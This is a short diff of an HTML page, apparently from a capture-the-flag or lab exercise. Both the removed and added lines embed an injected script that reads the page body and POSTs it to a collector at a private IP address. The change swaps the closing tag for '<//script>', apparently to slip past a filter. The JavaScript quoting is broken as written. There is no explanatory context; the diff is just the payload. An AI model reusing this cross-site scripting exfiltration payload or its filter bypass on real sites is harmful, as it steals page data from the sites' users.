--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
    	<title>My website</title>
    	<script >
       document.title="pig";
-   		var script_title="<script> var data=document.body.innerHTML; var xhr = new XMLHttpRequest(); xhr.open(\"POST", "http://192.168.2.82/collect_data\",true); xhr.send(\"flag=\"+data) </script>";
+   		var script_title="<script> var data=document.body.innerHTML; var xhr = new XMLHttpRequest(); xhr.open(\"POST", "http://192.168.2.82/collect_data\",true); xhr.send(\"flag=\"+data) <//script>";
    		document.title="happy";
 
 
